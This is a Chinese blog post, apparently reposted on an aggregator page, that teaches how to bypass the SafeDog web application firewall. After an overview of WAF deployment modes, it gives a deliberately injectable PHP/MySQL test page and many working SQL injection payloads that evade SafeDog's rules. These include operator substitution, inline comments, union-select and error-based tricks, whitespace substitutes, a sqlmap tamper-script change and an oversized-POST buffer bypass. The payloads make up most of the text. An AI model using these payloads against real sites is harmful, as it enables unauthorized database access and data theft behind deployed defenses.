当前位置：首页 > article >正文

绕waf系列之绕安全狗

article 2026/4/30 6:58:36

_转载自 _网络攻击的特定:攻击二象性:已知攻击和未知攻击目前市面主流的WAF产品:云WAF阿里云盾腾讯网站管家创宇盾ClodeFlare等软件产品类安全狗云锁360主机卫士ModSecurity硬件类型设备:启明星辰绿盟天融信飞塔等硬件waf缺陷:对HTTP协议的兼容性不强,对异常报文会产生bug,导致绕过WAF的核心原理:运用黑白思想特征匹配,漏洞签名:特定特征的漏洞,比如stract2漏洞对匹配结果进行响应(拦截,记录)WAF的几种部署模式:基于DNS解析修改DNS,让域名解析到反向代理服务器,所有流量经过反向代理进行检测,检测无问题之后再转发给后端的web服务器串联模式一般指的是反向代理模式,透明代理模式.反向代理模式会改变原有的网络拓扑,真实客户端ip会以HTTP header传递给后端web server.透明代理模式可以在不改变原有网络拓扑结构的情况下直接部署.旁路模式利用流量镜像技术,将业务流量分流给WAF产品,这种部署模式的优点是不会影响业务稳定性,所以WAF会投入更多的性能在检出率上面.但是缺点也很明显,不借助其他手段无法对检测出的攻击行为进行阻断.软件嵌入中间件检测引擎模式在使用nginx作为反向代理的业务中,WAF提高nginx模块嵌入原有nginx,将请求转发给检测引擎,可以做到在不改动原有的网络拓扑的情况下完成检测任务WAF为什么会被绕过:鱼(安全)和熊掌(业务性能)不能兼得,waf需要满足基本业务需求,所以一般不设置白名单之类的过于苛刻的操作WAF为了考虑通用性的问题,无法100%覆盖某些语言,中间件,数据库等特性硬件WAF自身往往存在漏洞架构:waf部署模式规则缺陷/特性协议:指HTTP0.9协议:TCP长连接WAF绕过实战—-绕过安全狗进行注入所谓的bypass waf实际上是去寻找位于waf设备之后处理应用层数据包的硬件/软件的特性,利用特性构造waf不能命中,但是在应用程序能够执行成功的payload,绕过防护实验环境:环境:安全狗Apache最新版本地测试代码(PHP):$id$_GET[id];$conmysql_connect(localhost,root,root);if(!$con){die(Could not connect: .mysql_error());}mysql_select_db(dvwa,$con);$querySELECT first_name,last_name FROM users WHERE user_id $id; ;$resultmysql_query($query)ordie(pre.mysql_error()./pre);while($rowmysql_fetch_array($result)){echo$row[0].nbsp.$row[1];echobr /;}echobr/;echo$query;mysql_close($con);绕过拦截and 11首先先稍微测试一番,发现存在安全狗http://127.0.0.1/test.php?id1 and 11%23and 1 拦截 and 1 拦截 and a 不拦截 and a 拦截 and ! 不拦截 and 11 拦截 and 1a 拦截 and hex(1) 不拦截通过测试我们发现当 and 后面跟上数字型和字符型时他会给我们拦截掉其实我们在安全狗的规则里面可以看到他拦截 and 和 or 所以我们有2个思路用其他字符替换 and 或者 or带入的不是字符串和数字型带入一个特殊符号针对第一种我们可以去看看运算符号随便找到几个| ^ xor / * || 等等还有很多与运算 a b , 或运算 a | b , 异或运算 a ^ b那么可以试着将and替换成,URL编码得到%26%26,将11替换成true或者false,发现可以成功绕过http://127.0.0.1/test.php?id1 %26%26 true%23另外在分享一些可以绕过目前版本的安全狗测试payload (注:mysql支持 || ,oracle不支持 ||http://127.0.0.1/test.php?id1 || true%23 //将and 11替换为|| true,也可以绕过安全狗 http://127.0.0.1/test.php?id1 ||(1) %23 //使用括号代替空格绕过 //异或逻辑运算符xor运算法则是两个条件相同同真或同假即为假0两个条件不同即为真1 http://127.0.0.1/test.php?id1 xor 1%23 http://127.0.0.1/test.php?id1 xor true%23绕过order by查询判断查询字段,使用mysql的/*!*/内敛注释去绕过防护,而其中的代码是可以正常执行的http://127.0.0.1/test.php?id1 /*!order*//*!by*/2%23绕过union select查询使用union xxx页面正常但是用union和select放在在一起就被发现啦在网上找了好一阵子,发现有大佬提供的payload使用正则表达式去绕过http://127.0.0.1/test.php?id1/*!user () regexp 0x5e72*/--对于数字型注入,可以将其转换成浮点型联合查询绕waf,%0a为换行符经过URL编码得到的,可以通过换行符进行绕过,函数中可以插入任何混淆字符绕过waf另外使用-1可以省去空格绕过wafhttp://127.0.0.1/test.php?id1.0 /*union/*!select-1*/,user--%0a()%23基于报错信息的注入绕安全狗http://127.0.0.1/test.php?id1 and /*!12345updatexml!*/(1,concat(0x7e,version()))%23 http://127.0.0.1/test.php?id1 and /*!12345extractvalue!*/(1,concat(0x7e,version()))%23绕过select from使用大括号去绕过http://127.0.0.1/test.php?id1.0 /*union/*!select-1*/,2,3,4From{information_schema.tables}使用反引号去绕过http://127.0.0.1/test.php?id1.0 /*union/*!select-1*/,2,3,4 Frominformation_schema.tables使用\N去绕过http://127.0.0.1/test.php?id1.0 /*union/*!select-1*/,2,3,\Nfrom information_schema.tables括号法去绕过http://127.0.0.1/test.php?id1.0 /*union/*!select-1*/,2,3,From(((information_schema.tables)))也可以组合起来http://127.0.0.1/test.php?id1.0 /*union/*!select-1*/,2,3,4\Nfrom{ainformation_schema.tables}这些都是去掉空格的合法语句,当然如果不拦截/*/或/!*/的话,也可以尝试这两个提示安全狗默认不开启对information_schema的拦截如果开启了那么就得找支持post传递数据的注入点了post下不拦截information_schema这个关键词。补充点phpmysql环境下支持的空格有%0a,%0b,%0c,%0d,%20,%09,%a0,/**/其中使用的最多的就是%0a,%0b,%a0,/**/这四个当作空格插入在语句中来扰乱waf检测。干货分享使用/sup!$asd%2a–//sup代替空格即可找到sqlmap中tamper目录下的space2plus.py文件将其中代替空格的/*/换成/!$asd%2a–*/即可使用sqlmap跑了。缓冲区溢出绕waf另外也可以对安全狗实行缓冲区溢出绕waf缓冲区溢出用于对WAF有不少WAF是C写的而C语言本身没有缓冲区保护机制因此如果WAF在处理测试量时超出其缓冲区长度就会引发bug从而实现绕过要求是(针对于安全狗而已):GET类型请求转换成POST类型Content-Length头长度大于4008正常参数放置在脏数据后面

绕waf系列之绕安全狗

相关文章：

绕waf系列之绕安全狗

32位微控制器技术解析与应用选型指南

工业计算机在机床上下料机器人中的应用与产品解决方案

项目材料收发存汇总软件怎么用更合适？先分清适用场景、岗位分工和落地边界

留美噩梦：毕业即失业？美国冻结40国OPT审批，百万份申请陷入“无底洞”！

自动驾驶相机坐标系转换

RTX 30/40系显卡实测：用OpenCV CUDA加速图像处理，效率提升多少？

提升GitLab代码质量分析效率的妙招

推荐保温钢管怎么选

2026年番禺全屋高端定制TOP排名及选材指南

【BUG记录】防止记录重复提交方案

A-index框架：突破深度伪造检测的对抗鲁棒性挑战

LLaMA-Factory结合DPO实现偏好对齐（RLHF简化方案）-方案选型对比

阿里云国际站代理商(云老大)：阿里云国际站无影云电脑使用指南

冷钱包选购的安全标准答案：锁定Ledger官方授权店铺

注册表，项，值，数据，微软这套命名完全反人类

商汤校招 C++ 考试题到底怎么考？这篇只能写题型线索，不能硬装完整真题

DMP侧信道攻击防御：SplittingSecrets技术解析

Fan Control终极指南：三步告别电脑噪音烦恼，打造个性化散热方案

美团校招 C++ 考试题到底怎么考？它不是独立 C++ 卷，更像业务系统题

告别SE93！SAP顾问必看：用参数型事务码关联QUERY报表的保姆级教程

从Django REST framework看NotImplementedError：打造更健壮的API视图与序列化器

3步解决视频卡顿问题：Flowframes AI插帧实战指南

字魂携手省级传承人魏伊平、何立宁，推出非遗定制字体

大数据系列(四) Spark：比MapReduce快100倍，它做了什么？

阿里云代理商：阿里云部署的Hermes Agent 钉钉接入指南

微步N10迷你主机评测：i3-N305性能与工业应用解析

GitHub Copilot 6 月 1 日起转向基于使用量计费，能否解决成本难题？

使用 20 年后告别！Emacs 替代工具开发完成，新工具优势大

凭什么推荐大家使用湖南肯瑟的导热硅脂系列产品